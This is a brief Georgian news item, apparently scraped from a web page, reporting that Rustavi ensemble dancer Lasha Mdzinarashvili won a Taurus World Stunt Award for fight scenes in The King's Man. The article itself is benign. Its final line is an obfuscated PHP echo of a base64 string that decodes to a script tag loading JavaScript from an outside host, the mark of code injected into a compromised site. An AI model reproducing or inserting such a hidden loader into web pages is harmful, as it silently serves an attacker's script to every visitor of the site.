celsiusi
ავერსი შნაიდერი
ლაშა მძინარაშვილი ჰოლივუდში კასკადიორების „ოსკარის“ ანუ „ტაურუსის მსოფლიო ტრიუკების ოსტატთა ჯილდოს“ (Taurus World Stunt Award) ლაურეატი გახდა. დაჯილდოვების ამსახველი ვიდეო მისივე ფეისბუქ გვერდზეა განთავსებული. 
 
როგორც ცნობილი ხდება, ანსამბლ „რუსთავის“ სოლისტმა პრიზი ქართული ცეკვის ელემენტებით დადგმული და შესრულებული საბრძოლო სცენებისთვის დაიმსახურა ფილმში The King's Man. „საუკეთესო ორთაბრძოლის“ კატეგორიაში მან ისეთი ნომინანტები დაამარცხა, როგორებიცაა სტუდია Marvel-ის „შავი ქვრივი“ (Black Widow), DC-ის „თვითმკვლელთა რაზმი“ (The Suicide Squad), Universal-ის „არავინ“ (Nobody) და Disney-ის „უკანასკნელი დუელი“ (The Last Duel), რომლის რეჟისორიც თვით რიდლი სკოტი გახლავთ. 
 
დაჯილდოების ცერემონია ლოს-ანჯელესში, სტუდია Paramount-ის პავილიონში გაიმართა.
 
488
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");